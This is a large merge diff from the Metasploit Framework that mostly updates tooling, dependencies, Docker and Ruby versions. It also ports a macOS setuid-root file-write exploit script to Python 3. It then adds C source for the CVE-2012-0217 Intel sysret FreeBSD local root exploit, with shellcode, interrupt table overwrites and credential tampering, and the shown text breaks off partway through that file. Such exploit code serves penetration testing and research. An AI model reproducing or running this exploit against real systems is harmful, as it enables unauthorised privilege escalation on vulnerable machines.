automatic module_metadata_base.json update

Land #11607 , Add webmin CVE
2019-03-21 09:41:47 -07:00 · 2019-03-21 11:33:33 -05:00 · 2019-03-21 09:30:04 -07:00 · 2019-03-21 11:28:45 -05:00 · 2019-03-21 11:21:47 -05:00 · 2019-03-21 11:20:21 -05:00
405 changed files with 35366 additions and 11306 deletions
@@ -9,7 +9,7 @@
 # inherit_from: .rubocop_todo.yml

 AllCops:
-  TargetRubyVersion: 2.2
+  TargetRubyVersion: 2.4

 Metrics/ClassLength:
  Description: 'Most Metasploit modules are quite large. This is ok.'
@@ -45,6 +45,10 @@ Style/RedundantReturn:
  Description: 'This often looks weird when mixed with actual returns, and hurts nothing'
  Enabled: false

+Naming/VariableNumber:
+  Description: 'To make it easier to use reference code, disable this cop'
+  Enabled: false
+
 Style/NumericPredicate:
  Description: 'This adds no efficiency nor space saving'
  Enabled: false
@@ -55,14 +59,18 @@ Style/Documentation:
  Exclude:
    - 'modules/**/*'

-Layout/IndentHeredoc:
+Layout/SpaceInsideArrayLiteralBrackets:
  Enabled: false
-  Description: 'We need to leave this disabled for Ruby 2.2 compat, remove in 2018'
+  Description: 'Almost all module metadata have space in brackets'

 Style/GuardClause:
  Enabled: false
  Description: 'This often introduces bugs in tested code'

+Style/EmptyLiteral:
+  Enabled: false
+  Description: 'This looks awkward when you mix empty and non-empty literals'
+
 Style/NegatedIf:
  Enabled: false
  Description: 'This often introduces bugs in tested code'
@@ -72,9 +80,16 @@ Style/ConditionalAssignment:
  Description: 'This is confusing for folks coming from other languages'

 Style/Encoding:
-  Enabled: true
  Description: 'We prefer binary to UTF-8.'
-  EnforcedStyle: 'when_needed'
+  Enabled: false
+
+Style/ParenthesesAroundCondition:
+  Enabled: false
+  Description: 'This is used in too many places to discount, especially in ported code. Has little effect'
+
+Style/TrailingCommaInArrayLiteral:
+  Enabled: false
+  Description: 'This is often a useful pattern, and is actually required by other languages. It does not hurt.'

 Metrics/LineLength:
  Description: >-
@@ -83,6 +98,13 @@ Metrics/LineLength:
  Enabled: true
  Max: 180

+Metrics/BlockLength:
+  Enabled: true
+  Description: >-
+                  While the style guide suggests 10 lines, exploit definitions
+                  often exceed 200 lines.
+  Max: 300
+
 Metrics/MethodLength:
  Enabled: true
  Description: >-
@@ -90,10 +112,10 @@ Metrics/MethodLength:
                  often exceed 200 lines.
  Max: 300

-# Basically everything in metasploit needs binary encoding, not UTF-8.
-# Disable this here and enforce it through msftidy
-Style/Encoding:
-  Enabled: false
+Naming/UncommunicativeMethodParamName:
+  Enabled: true
+  Description: 'Whoever made this requirement never looked at crypto methods, IV'
+  MinNameLength: 2

 # %q() is super useful for long strings split over multiple lines and
 # is very common in module constructors for things like descriptions
@@ -104,11 +126,31 @@ Style/NumericLiterals:
  Enabled: false
  Description: 'This often hurts readability for exploit-ish code.'

+Layout/AlignHash:
+  Enabled: false
+  Description: 'aligning info hashes to match these rules is almost impossible to get right'
+
+Layout/EmptyLines:
+  Enabled: false
+  Description: 'these are used to increase readability'
+
+Layout/EmptyLinesAroundClassBody:
+  Enabled: false
+  Description: 'these are used to increase readability'
+
+Layout/EmptyLinesAroundMethodBody:
+  Enabled: false
+  Description: 'these are used to increase readability'
+
 Layout/AlignParameters:
  Enabled: true
  EnforcedStyle: 'with_fixed_indentation'
  Description: 'initialize method of every module has fixed indentation for Name, Description, etc'

+Style/For:
+  Enabled: false
+  Description: 'if a module is written with a for loop, it cannot always be logically replaced with each'
+
 Style/StringLiterals:
  Enabled: false
  Description: 'Single vs double quote fights are largely unproductive.'
@@ -1 +1 @@
-2.5.3
+2.6.1
@@ -14,12 +14,14 @@ rvm:
  - '2.3.8'
  - '2.4.5'
  - '2.5.3'
+  - '2.6.1'

 env:
  - CMD='bundle exec rake rspec-rerun:spec SPEC_OPTS="--tag content"'
  - CMD='bundle exec rake rspec-rerun:spec SPEC_OPTS="--tag ~content"'
  # Used for testing the remote data service
  - CMD='bundle exec rake rspec-rerun:spec SPEC_OPTS="--tag content" REMOTE_DB=1'
+  - CMD='bundle exec rake rspec-rerun:spec SPEC_OPTS="--tag ~content" REMOTE_DB=1'

 matrix:
  fast_finish: true
@@ -1,4 +1,4 @@
-FROM ruby:2.5.3-alpine3.7 AS builder
+FROM ruby:2.6.1-alpine3.9 AS builder
 LABEL maintainer="Rapid7"

 ARG BUNDLER_ARGS="--jobs=8 --without development test coverage"
@@ -16,7 +16,7 @@ RUN apk add --no-cache \
      bison \
      build-base \
      ruby-dev \
-      libressl-dev \
+      openssl-dev \
      readline-dev \
      sqlite-dev \
      postgresql-dev \
@@ -29,7 +29,6 @@ RUN apk add --no-cache \
      git \
    && echo "gem: --no-ri --no-rdoc" > /etc/gemrc \
    && gem update --system \
-    && gem install bundler \
    && bundle install --clean --no-cache --system $BUNDLER_ARGS \
    # temp fix for https://github.com/bundler/bundler/issues/6680
    && rm -rf /usr/local/bundle/cache \
@@ -37,7 +36,7 @@ RUN apk add --no-cache \
    && chmod -R a+r /usr/local/bundle


-FROM ruby:2.5.3-alpine3.7
+FROM ruby:2.6.1-alpine3.9
 LABEL maintainer="Rapid7"

 ENV APP_HOME=/usr/src/metasploit-framework
@@ -3,6 +3,8 @@ source 'https://rubygems.org'
 #   spec.add_runtime_dependency '<name>', [<version requirements>]
 gemspec name: 'metasploit-framework'

+gem 'sqlite3', '~>1.3.0'
+
 # separate from test as simplecov is not run on travis-ci
 group :coverage do
  # code coverage for tests
@@ -1,7 +1,7 @@
 PATH
  remote: .
  specs:
-    metasploit-framework (5.0.3)
+    metasploit-framework (5.0.13)
      actionpack (~> 4.2.6)
      activerecord (~> 4.2.6)
      activesupport (~> 4.2.6)
@@ -21,9 +21,9 @@ PATH
      metasploit-concern
      metasploit-credential
      metasploit-model
-      metasploit-payloads (= 1.3.58)
+      metasploit-payloads (= 1.3.62)
      metasploit_data_models
-      metasploit_payloads-mettle (= 0.5.4)
+      metasploit_payloads-mettle (= 0.5.7)
      mqtt
      msgpack
      nessus_rest
@@ -38,7 +38,7 @@ PATH
      patch_finder
      pcaprub
      pdf-reader
-      pg (= 0.20.0)
+      pg (~> 0.20)
      railties
      rb-readline
      recog
@@ -80,27 +80,27 @@ GEM
  remote: https://rubygems.org/
  specs:
    Ascii85 (1.0.3)
-    actionpack (4.2.11)
-      actionview (= 4.2.11)
-      activesupport (= 4.2.11)
+    actionpack (4.2.11.1)
+      actionview (= 4.2.11.1)
+      activesupport (= 4.2.11.1)
      rack (~> 1.6)
      rack-test (~> 0.6.2)
      rails-dom-testing (~> 1.0, >= 1.0.5)
      rails-html-sanitizer (~> 1.0, >= 1.0.2)
-    actionview (4.2.11)
-      activesupport (= 4.2.11)
+    actionview (4.2.11.1)
+      activesupport (= 4.2.11.1)
      builder (~> 3.1)
      erubis (~> 2.7.0)
      rails-dom-testing (~> 1.0, >= 1.0.5)
      rails-html-sanitizer (~> 1.0, >= 1.0.3)
-    activemodel (4.2.11)
-      activesupport (= 4.2.11)
+    activemodel (4.2.11.1)
+      activesupport (= 4.2.11.1)
      builder (~> 3.1)
-    activerecord (4.2.11)
-      activemodel (= 4.2.11)
-      activesupport (= 4.2.11)
+    activerecord (4.2.11.1)
+      activemodel (= 4.2.11.1)
+      activesupport (= 4.2.11.1)
      arel (~> 6.0)
-    activesupport (4.2.11)
+    activesupport (4.2.11.1)
      i18n (~> 0.7)
      minitest (~> 5.1)
      thread_safe (~> 0.3, >= 0.3.4)
@@ -111,7 +111,7 @@ GEM
    arel (6.0.4)
    arel-helpers (2.8.0)
      activerecord (>= 3.1.0, < 6)
-    backports (3.11.4)
+    backports (3.12.0)
    bcrypt (3.1.12)
    bcrypt_pbkdf (1.0.0)
    bindata (2.4.4)
@@ -137,12 +137,12 @@ GEM
      eventmachine (>= 1.0.0.beta.4)
    erubis (2.7.0)
    eventmachine (1.2.7)
-    factory_bot (4.11.1)
-      activesupport (>= 3.0.0)
-    factory_bot_rails (4.11.1)
-      factory_bot (~> 4.11.1)
-      railties (>= 3.0.0)
-    faker (1.9.1)
+    factory_bot (5.0.2)
+      activesupport (>= 4.2.0)
+    factory_bot_rails (5.0.1)
+      factory_bot (~> 5.0.0)
+      railties (>= 4.2.0)
+    faker (1.9.3)
      i18n (>= 0.7)
    faraday (0.15.4)
      multipart-post (>= 1.2, < 3)
@@ -154,7 +154,7 @@ GEM
      concurrent-ruby (~> 1.0)
    jsobfu (0.4.2)
      rkelly-remix
-    json (2.1.0)
+    json (2.2.0)
    loofah (2.2.3)
      crass (~> 1.0.2)
      nokogiri (>= 1.5.9)
@@ -163,12 +163,12 @@ GEM
      activemodel (~> 4.2.6)
      activesupport (~> 4.2.6)
      railties (~> 4.2.6)
-    metasploit-credential (3.0.2)
+    metasploit-credential (3.0.3)
      metasploit-concern
      metasploit-model
      metasploit_data_models (>= 3.0.0)
      net-ssh
-      pg (~> 0.15)
+      pg
      railties
      rex-socket
      rubyntlm
@@ -177,26 +177,26 @@ GEM
      activemodel (~> 4.2.6)
      activesupport (~> 4.2.6)
      railties (~> 4.2.6)
-    metasploit-payloads (1.3.58)
-    metasploit_data_models (3.0.4)
+    metasploit-payloads (1.3.62)
+    metasploit_data_models (3.0.8)
      activerecord (~> 4.2.6)
      activesupport (~> 4.2.6)
      arel-helpers
      metasploit-concern
      metasploit-model
-      pg (= 0.20.0)
+      pg
      postgres_ext
      railties (~> 4.2.6)
      recog (~> 2.0)
-    metasploit_payloads-mettle (0.5.4)
+    metasploit_payloads-mettle (0.5.7)
    method_source (0.9.2)
    mini_portile2 (2.4.0)
    minitest (5.11.3)
    mqtt (0.5.0)
-    msgpack (1.2.6)
+    msgpack (1.2.9)
    multipart-post (2.0.0)
    nessus_rest (0.1.6)
-    net-ssh (5.1.0)
+    net-ssh (5.2.0)
    network_interface (0.0.2)
    nexpose (7.2.1)
    nokogiri (1.10.1)
@@ -215,7 +215,7 @@ GEM
      hashery (~> 2.0)
      ruby-rc4
      ttfunk
-    pg (0.20.0)
+    pg (0.21.0)
    pg_array_parser (0.0.9)
    postgres_ext (3.0.1)
      activerecord (~> 4.0)
@@ -238,14 +238,14 @@ GEM
      rails-deprecated_sanitizer (>= 1.0.1)
    rails-html-sanitizer (1.0.4)
      loofah (~> 2.2, >= 2.2.2)
-    railties (4.2.11)
-      actionpack (= 4.2.11)
-      activesupport (= 4.2.11)
+    railties (4.2.11.1)
+      actionpack (= 4.2.11.1)
+      activesupport (= 4.2.11.1)
      rake (>= 0.8.7)
      thor (>= 0.18.1, < 2.0)
    rake (12.3.2)
    rb-readline (0.5.5)
-    recog (2.1.45)
+    recog (2.2.1)
      nokogiri
    redcarpet (3.4.0)
    rex-arch (0.1.13)
@@ -284,7 +284,7 @@ GEM
      metasm
      rex-core
      rex-text
-    rex-socket (0.1.15)
+    rex-socket (0.1.17)
      rex-core
    rex-sslscan (0.1.5)
      rex-core
@@ -318,7 +318,7 @@ GEM
    rspec-rerun (1.1.0)
      rspec (~> 3.0)
    rspec-support (3.8.0)
-    ruby-macho (2.1.0)
+    ruby-macho (2.2.0)
    ruby-rc4 (0.1.5)
    ruby_smb (1.0.5)
      bindata
@@ -339,7 +339,7 @@ GEM
      rack-protection (~> 1.4)
      tilt (>= 1.3, < 3)
    sqlite3 (1.3.13)
-    sshkey (1.9.0)
+    sshkey (2.0.0)
    swagger-blocks (2.0.2)
    thin (1.7.2)
      daemons (~> 1.0, >= 1.0.9)
@@ -377,6 +377,7 @@ DEPENDENCIES
  rspec-rails
  rspec-rerun
  simplecov
+  sqlite3 (~> 1.3.0)
  swagger-blocks
  timecop
  yard
@@ -115,6 +115,10 @@ Files: lib/msf/core/web_services/public/*, lib/msf/core/web_services/views/api_d
 Copyright: Copyright 2018 SmartBear Software
 License: Apache 2.0

+Files: data/jtr/*
+Copyright: Copyright 1996-2013 by Solar Designer
+License: GNU GPL 2.0
+
 License: BSD-2-clause
 Redistribution and use in source and binary forms, with or without modification,
 are permitted provided that the following conditions are met:
@@ -1,15 +1,15 @@
 This file is auto-generated by tools/dev/update_gem_licenses.sh
 Ascii85, 1.0.3, MIT
-actionpack, 4.2.11, MIT
-actionview, 4.2.11, MIT
-activemodel, 4.2.11, MIT
-activerecord, 4.2.11, MIT
-activesupport, 4.2.11, MIT
+actionpack, 4.2.11.1, MIT
+actionview, 4.2.11.1, MIT
+activemodel, 4.2.11.1, MIT
+activerecord, 4.2.11.1, MIT
+activesupport, 4.2.11.1, MIT
 addressable, 2.5.2, "Apache 2.0"
 afm, 0.2.2, MIT
 arel, 6.0.4, MIT
 arel-helpers, 2.8.0, MIT
-backports, 3.11.4, MIT
+backports, 3.12.0, MIT
 bcrypt, 3.1.12, MIT
 bcrypt_pbkdf, 1.0.0, MIT
 bindata, 2.4.4, ruby
@@ -29,9 +29,9 @@ em-http-request, 1.1.5, MIT
 em-socksify, 0.3.2, MIT
 erubis, 2.7.0, MIT
 eventmachine, 1.2.7, "ruby, GPL-2.0"
-factory_bot, 4.11.1, MIT
-factory_bot_rails, 4.11.1, MIT
-faker, 1.9.1, MIT
+factory_bot, 5.0.2, MIT
+factory_bot_rails, 5.0.1, MIT
+faker, 1.9.3, MIT
 faraday, 0.15.4, MIT
 filesize, 0.2.0, MIT
 fivemat, 1.3.7, MIT
@@ -39,24 +39,24 @@ hashery, 2.1.2, "Simplified BSD"
 http_parser.rb, 0.6.0, MIT
 i18n, 0.9.5, MIT
 jsobfu, 0.4.2, "New BSD"
-json, 2.1.0, ruby
+json, 2.2.0, ruby
 loofah, 2.2.3, MIT
 metasm, 1.0.3, LGPL
 metasploit-concern, 2.0.5, "New BSD"
-metasploit-credential, 3.0.2, "New BSD"
-metasploit-framework, 5.0.3, "New BSD"
+metasploit-credential, 3.0.3, "New BSD"
+metasploit-framework, 5.0.13, "New BSD"
 metasploit-model, 2.0.4, "New BSD"
-metasploit-payloads, 1.3.58, "3-clause (or ""modified"") BSD"
-metasploit_data_models, 3.0.4, "New BSD"
-metasploit_payloads-mettle, 0.5.1, "3-clause (or ""modified"") BSD"
+metasploit-payloads, 1.3.62, "3-clause (or ""modified"") BSD"
+metasploit_data_models, 3.0.8, "New BSD"
+metasploit_payloads-mettle, 0.5.7, "3-clause (or ""modified"") BSD"
 method_source, 0.9.2, MIT
 mini_portile2, 2.4.0, MIT
 minitest, 5.11.3, MIT
 mqtt, 0.5.0, MIT
-msgpack, 1.2.6, "Apache 2.0"
+msgpack, 1.2.9, "Apache 2.0"
 multipart-post, 2.0.0, MIT
 nessus_rest, 0.1.6, MIT
-net-ssh, 5.1.0, MIT
+net-ssh, 5.2.0, MIT
 network_interface, 0.0.2, MIT
 nexpose, 7.2.1, "New BSD"
 nokogiri, 1.10.1, MIT
@@ -67,7 +67,7 @@ packetfu, 1.1.13, BSD
 patch_finder, 1.0.2, "New BSD"
 pcaprub, 0.13.0, LGPL-2.1
 pdf-reader, 2.2.0, MIT
-pg, 0.20.0, "New BSD"
+pg, 0.21.0, "New BSD"
 pg_array_parser, 0.0.9, unknown
 postgres_ext, 3.0.1, MIT
 pry, 0.12.2, MIT
@@ -78,10 +78,10 @@ rack-test, 0.6.3, MIT
 rails-deprecated_sanitizer, 1.0.3, MIT
 rails-dom-testing, 1.0.9, MIT
 rails-html-sanitizer, 1.0.4, MIT
-railties, 4.2.11, MIT
+railties, 4.2.11.1, MIT
 rake, 12.3.2, MIT
 rb-readline, 0.5.5, BSD
-recog, 2.1.45, unknown
+recog, 2.2.1, unknown
 redcarpet, 3.4.0, MIT
 rex-arch, 0.1.13, "New BSD"
 rex-bin_tools, 0.1.6, "New BSD"
@@ -96,7 +96,7 @@ rex-powershell, 0.1.79, "New BSD"
 rex-random_identifier, 0.1.4, "New BSD"
 rex-registry, 0.1.3, "New BSD"
 rex-rop_builder, 0.1.3, "New BSD"
-rex-socket, 0.1.15, "New BSD"
+rex-socket, 0.1.17, "New BSD"
 rex-sslscan, 0.1.5, "New BSD"
 rex-struct2, 0.1.2, "New BSD"
 rex-text, 0.2.21, "New BSD"
@@ -109,7 +109,7 @@ rspec-mocks, 3.8.0, MIT
 rspec-rails, 3.8.2, MIT
 rspec-rerun, 1.1.0, MIT
 rspec-support, 3.8.0, MIT
-ruby-macho, 2.1.0, MIT
+ruby-macho, 2.2.0, MIT
 ruby-rc4, 0.1.5, MIT
 ruby_smb, 1.0.5, "New BSD"
 rubyntlm, 0.6.2, MIT
@@ -119,7 +119,7 @@ simplecov, 0.16.1, MIT
 simplecov-html, 0.10.2, MIT
 sinatra, 1.4.8, MIT
 sqlite3, 1.3.13, "New BSD"
-sshkey, 1.9.0, MIT
+sshkey, 2.0.0, MIT
 swagger-blocks, 2.0.2, MIT
 thin, 1.7.2, "GPLv2+, Ruby 1.8"
 thor, 0.20.3, MIT
@@ -31,7 +31,6 @@ Vagrant.configure(2) do |config|
  [ "gpg --keyserver hkp://keys.gnupg.net --recv-keys 409B6B1796C275462A1703113804BB82D39DC0E3",
    "curl -L https://get.rvm.io | bash -s stable",
    "source ~/.rvm/scripts/rvm && cd /vagrant && rvm install `cat .ruby-version`",
-    "source ~/.rvm/scripts/rvm && cd /vagrant && gem install bundler",
    "source ~/.rvm/scripts/rvm && cd /vagrant && bundle",
    "mkdir -p ~/.msf4",
  ].each do |step|
@@ -24,9 +24,12 @@ end

 begin
  require 'bundler/setup'
-rescue LoadError
-  $stderr.puts "[*] Metasploit requires the Bundler gem to be installed"
-  $stderr.puts "    $ gem install bundler"
+rescue LoadError => e
+  $stderr.puts "[*] Bundler failed to load and returned this error:"
+  $stderr.puts
+  $stderr.puts "   '#{e}'"
+  $stderr.puts
+  $stderr.puts "[*] You may need to uninstall or upgrade bundler"
  exit(1)
 end

@@ -14,7 +14,7 @@ development: &pgsql
  adapter: postgresql
  database: metasploit_framework_development
  username: postgres
-  pool: 5
+  pool: 25
  timeout: 5

 # Warning: The database defined as "test" will be erased and
@@ -27,7 +27,7 @@ def use_old_api():
 args = sys.argv

 if len(args) != 3:
-    print "usage: exploit.py source_binary dest_binary_as_root"
+    print("usage: exploit.py source_binary dest_binary_as_root")
    sys.exit(-1)

 source_binary = args[1]
@@ -42,7 +42,7 @@ attr = NSMutableDictionary.alloc().init()
 attr.setValue_forKey_(04777, NSFilePosixPermissions)
 data = NSData.alloc().initWithContentsOfFile_(source_binary)

-print "will write file", dest_binary
+print("will write file", dest_binary)

 if use_old_api():
    adm_lib = load_lib("/Admin.framework/Admin")
@@ -68,6 +68,6 @@ else:
    tool.createFileWithContents_path_attributes_(data, dest_binary, attr, 0)


-print "Done!"
+print("Done!")

 del pool
@@ -0,0 +1,345 @@
+// CVE-2012-0217 Intel sysret exploit -- iZsh (izsh at fail0verflow.com)
+// Copyright 2012 all right reserved, not for commercial uses, bitches
+// Infringement Punishment: Monkeys coming out of your ass Bruce Almighty style.
+#include <stdio.h>
+#include <stdlib.h>
+#include <stdint.h>
+#include <unistd.h>
+#include <string.h>
+#include <sys/mman.h>
+#include <sys/utsname.h>
+#include <machine/cpufunc.h>
+#define _WANT_UCRED
+#include <sys/proc.h>
+#include <machine/segments.h>
+#include <sys/param.h>
+#include <sys/linker.h>
+
+uintptr_t Xofl_ptr, Xbnd_ptr, Xill_ptr, Xdna_ptr, Xpage_ptr, Xfpu_ptr, Xalign_ptr, Xmchk_ptr, Xxmm_ptr;
+
+struct gate_descriptor * sidt()
+{
+	struct region_descriptor idt;
+
+	asm ("sidt %0": "=m"(idt));
+
+	return (struct gate_descriptor*)idt.rd_base;
+} 
+
+u_long get_symaddr(char *symname)
+{
+	struct kld_sym_lookup ksym;
+
+	ksym.version = sizeof (ksym);
+	ksym.symname = symname;
+
+	if (kldsym(0, KLDSYM_LOOKUP, &ksym) < 0) {
+		perror("kldsym");
+		exit(1);
+	}
+	printf("    [+] Resolved %s to %#lx\n", ksym.symname, ksym.symvalue);
+	return ksym.symvalue;
+}
+
+// Code taken from amd64/amd64/machdep.c
+void setidt(struct gate_descriptor *idt, int idx, uintptr_t func, int typ, int dpl, int ist)
+{
+	struct gate_descriptor *ip;
+
+	ip = idt + idx;
+	ip->gd_looffset = func;
+	ip->gd_selector = GSEL(GCODE_SEL, SEL_KPL);
+	ip->gd_ist = ist;
+	ip->gd_xx = 0;
+	ip->gd_type = typ;
+	ip->gd_dpl = dpl;
+	ip->gd_p = 1;
+	ip->gd_hioffset = func>>16;
+}
+
+void shellcode()
+{
+	// Actually we dont really need to spawn a shell since we
+	// changed our whole cred struct.
+	// Just exit...
+	printf("[*] Got root!\n");
+	exit(0);
+}
+
+void kernelmodepayload()
+{
+	struct thread *td;
+	struct ucred *cred;
+
+	// We need to restore/recover whatever we smashed
+	// We inititalized rsp to idt[14] + 10*8, i.e. idt[19] (see trigger())
+	// The #GP exception frame writes 6*64bit registers, i.e. it overwrites
+	// idt[18], idt[17] and idt[16]
+	// thus overall we have:
+	// - idt[18], idt[17] and idt[16] are trashed
+	// - tf_addr -> overwrites the 64bit-LSB of idt[15]
+	// - tf_trapno -> overwrites Target Offset[63:32] of idt[14]
+	// - rdi -> overwrites the 64bit-LSB of idt[7]
+	// - #PF exception frame overwrites idt[6], idt[5] and idt[4]
+	struct gate_descriptor *idt = sidt();
+	setidt(idt, IDT_OF, Xofl_ptr, SDT_SYSIGT, SEL_KPL, 0); // 4
+	setidt(idt, IDT_BR, Xbnd_ptr, SDT_SYSIGT, SEL_KPL, 0); // 5
+	setidt(idt, IDT_UD, Xill_ptr, SDT_SYSIGT, SEL_KPL, 0); // 6
+	setidt(idt, IDT_NM, Xdna_ptr, SDT_SYSIGT, SEL_KPL, 0); // 7
+	setidt(idt, IDT_PF, Xpage_ptr, SDT_SYSIGT, SEL_KPL, 0); // 14
+	setidt(idt, IDT_MF, Xfpu_ptr, SDT_SYSIGT, SEL_KPL, 0); // 15
+	setidt(idt, IDT_AC, Xalign_ptr, SDT_SYSIGT, SEL_KPL, 0); // 16
+	setidt(idt, IDT_MC, Xmchk_ptr, SDT_SYSIGT, SEL_KPL, 0); // 17
+	setidt(idt, IDT_XF, Xxmm_ptr, SDT_SYSIGT, SEL_KPL, 0); // 18
+
+	// get the thread pointer
+	asm ("mov %%gs:0, %0" : "=r"(td));
+
+	// The Dark Knight Rises
+	cred = td->td_proc->p_ucred;
+	cred->cr_uid = cred->cr_ruid = cred->cr_rgid = 0;
+	cred->cr_groups[0] = 0;
+
+	// return to user mode to spawn the shell
+	asm ("swapgs; sysretq;" :: "c"(shellcode)); // store the shellcode addr to rcx
+}
+
+#define TRIGGERCODESIZE 20
+#define TRAMPOLINECODESIZE 18
+
+void trigger()
+{
+	printf("[*] Setup...\n");
+	// Allocate one page just before the non-canonical address
+	printf("    [+] Trigger code...\n");
+	uint64_t pagesize = getpagesize();
+	uint8_t * area = (uint8_t*)((1ULL << 47) - pagesize);
+	area = mmap(area, pagesize,
+		PROT_READ | PROT_WRITE | PROT_EXEC,
+		MAP_FIXED | MAP_ANON | MAP_PRIVATE, -1, 0);
+	if (area == MAP_FAILED) {
+		perror("mmap (trigger)");
+		exit(1);
+	}
+
+	// Copy the trigger code at the end of the page
+	// such that the syscall instruction is at its
+	// boundary
+	char triggercode[] =
+		"\xb8\x18\x00\x00\x00" // mov rax, 24; #getuid
+		"\x48\x89\xe3" // mov rbx, rsp; save the user's stack for later
+		"\x48\xbc\xbe\xba\xfe\xca\xde\xc0\xad\xde" // mov rsp, 0xdeadc0decafebabe
+		"\x0f\x05"; // syscall
+
+	uint8_t * trigger_addr = area + pagesize - TRIGGERCODESIZE;
+	memcpy(trigger_addr, triggercode, TRIGGERCODESIZE);
+
+	// There are two outcomes given a target rsp:
+	// - if rsp can't be written to, a double fault is triggered
+	//   (Xdblfault defined in sys/amd64/amd64/exception.S)
+	//   and the exception frame is pushed to a special stack
+	// - otherwise a #GP is triggered
+	//	 (Xprot defined in sys/amd64/amd64/exception.S)
+	//   and the exception frame is pushed to [rsp]
+	//
+	// In the latter case, trouble is... #GP triggers a page fault
+	// (Xpage):
+	//  IDTVEC(prot)
+	//  	subq	$TF_ERR,%rsp
+	//  [1]	movl	$T_PROTFLT,TF_TRAPNO(%rsp)
+	//  [2]	movq	$0,TF_ADDR(%rsp)
+	//  [3]	movq	%rdi,TF_RDI(%rsp)	/* free up a GP register */
+	//  	leaq	doreti_iret(%rip),%rdi
+	//  	cmpq	%rdi,TF_RIP(%rsp)
+	//  	je	1f			/* kernel but with user gsbase!! */
+	//  [4]	testb	$SEL_RPL_MASK,TF_CS(%rsp) /* Did we come from kernel? */
+	//  	jz	2f			/* already running with kernel GS.base */
+	//  1:	swapgs
+	//  2:	movq	PCPU(CURPCB),%rdi [5]
+	//
+	// [4] sets the Z flag because we come from the kernel (while executing sysret)
+	// and we therefore skip swapgs. But GS is in fact the user GS.base! Indeed
+	// it was restored just before calling sysret...
+	// Thus, [5] triggers a pagefault while trying to access gs:data
+	// If we don't do anything we'll eventually doublefault, tripplefault etc. and crash
+	//
+	// We therefore need a way: (1) to recover from the GP, (2) to clean
+	// any mess we did. Both could be solved if we can get get an arbitrary
+	// code execution by the time we reach [5] (NB: this is not mandatory, we could
+	// get the code execution later down the fault trigger chain)
+	//
+	// So... here is the idea: wouldn't it be nice if we could overwrite the
+	// page fault handler's address and therefore get code execution when [5]
+	// triggers the #PF?
+	//
+	// For reference:
+	// Gate descriptor:
+	// +0: Target Offset[15:0] | Target Selector
+	// +4: Some stuff | Target Offset[31:16]
+	// +8: Target Offset[63:32]
+	// +12: Stuff
+	//
+	// and from include/frame.h:
+	//  struct trapframe {
+	//  	register_t	tf_rdi;
+	//  	register_t	tf_rsi;
+	//  	register_t	tf_rdx;
+	//  	register_t	tf_rcx;
+	//  	register_t	tf_r8;
+	//  	register_t	tf_r9;
+	//  	register_t	tf_rax;
+	//  	register_t	tf_rbx;
+	//  	register_t	tf_rbp;
+	//  	register_t	tf_r10;
+	//  	register_t	tf_r11;
+	//  	register_t	tf_r12;
+	//  	register_t	tf_r13;
+	//  	register_t	tf_r14;
+	//  	register_t	tf_r15;
+	//  	uint32_t	tf_trapno;
+	//  	uint16_t	tf_fs;
+	//  	uint16_t	tf_gs;
+	//  	register_t	tf_addr;
+	//  	uint32_t	tf_flags;
+	//  	uint16_t	tf_es;
+	//  	uint16_t	tf_ds;
+	//  	/* below portion defined in hardware */
+	//  	register_t	tf_err;
+	//  	register_t	tf_rip;
+	//  	register_t	tf_cs;
+	//  	register_t	tf_rflags;
+	//  	register_t	tf_rsp;
+	//  	register_t	tf_ss;
+	//  };
+	//
+	// When the exception is triggered, the hardware pushes
+	// ss, rsp, rflags, cs, rip and err
+	//
+	// We can see that [1], [2] and [3] write to the stack
+	// [3] is fully user-controlled through rdi, so we could try to align
+	// rsp such that [3] overwrites the offset address
+	//
+	// The trouble is... rsp is 16byte aligned for exceptions. We can
+	// therefore only overwrite the first 32-LSB of the offset address
+	// (check how rdi is 16byte aligned in this trapframe)
+	//
+	// [2] writes 0 to tf_addr which is also 16byte aligned. So no dice.
+	// That leaves us with [1] which writes T_PROTFLT (0x9) to tf_trapno
+	// and tf_trapno is 16byte aligned + 8!
+	// This enables us to set Target Offset[63:32] to 0x9
+	//
+	// We set rsp to &idt[14] + 10 * 8 (to align tf_trapno with Offset[63:32])
+	*(uint64_t*)(trigger_addr + 10) = (uint64_t)(((uint8_t*)&sidt()[14]) + 10 * 8);
+	// Hence, the #PF handler's address is now 0x9WWXXYYZZ
+	// Furthermore, WWXXYYZZ is known since we can get (see get_symaddr()) the #PF's address
+	// Thus, the idea is to setup a trampoline code at 0x9WWXXYYZZ which does
+	// some setup and jump to our kernel mode code
+	printf("    [+] Trampoline code...\n");
+	char trampolinecode[] =
+		"\x0f\x01\xf8" // swapgs; switch back to the kernel's GS.base
+		"\x48\x89\xdc" // mov rsp, rbx; restore rsp, it's enough to use the user's stack
+		"\x48\xb8\xbe\xba\xfe\xca\xde\xc0\xad\xde" // mov rax, 0xdeadc0decafebabe
+		"\xff\xe0"; // jmp rax
+
+	uint8_t * trampoline = (uint8_t*)(0x900000000 | (Xpage_ptr & 0xFFFFFFFF));
+	size_t trampoline_allocsize = pagesize;
+	// We round the address to the PAGESIZE for the allocation
+	// Not enough space for the trampoline code ?
+	if ((uint8_t*)((uint64_t)trampoline & ~(pagesize-1)) + pagesize < trampoline + TRAMPOLINECODESIZE)
+		trampoline_allocsize += pagesize;
+	if (mmap((void*)((uint64_t)trampoline & ~(pagesize-1)), trampoline_allocsize,
+		PROT_READ | PROT_WRITE | PROT_EXEC,
+		MAP_FIXED | MAP_ANON | MAP_PRIVATE, -1, 0) == MAP_FAILED)
+	{
+		perror("mmap (trampoline)");
+		exit(1);
+	}
+	memcpy(trampoline, trampolinecode, TRAMPOLINECODESIZE);
+	*(uint64_t*)(trampoline + 8) = (uint64_t)kernelmodepayload;
+	// Call it
+	printf("[*] Fire in the hole!\n");
+	((void (*)())trigger_addr)();
+}
+
+typedef struct validtarget
+{
+	char * sysname;
+	char * release;
+	char * machine;
+} validtarget_t;
+
+int validate_target(char * sysname, char * release, char * machine)
+{
+	validtarget_t targets[] = {
+		{ "FreeBSD", "8.3-RELEASE", "amd64" },
+		{ "FreeBSD", "9.0-RELEASE", "amd64" },
+		{ 0, 0, 0 }
+	};
+
+	int found = 0;
+	int i = 0;
+
+	while (!found && targets[i].sysname) {
+		found = !strcmp(targets[i].sysname, sysname)
+			&& !strcmp(targets[i].release, release)
+			&& !strcmp(targets[i].machine, machine);
+		++i;
+	}
+	return found;
+}
+
+void get_cpu_vendor(char * cpu_vendor)
+{
+	u_int regs[4];
+
+	do_cpuid(0, regs);
+   ((u_int *)cpu_vendor)[0] = regs[1];
+   ((u_int *)cpu_vendor)[1] = regs[3];
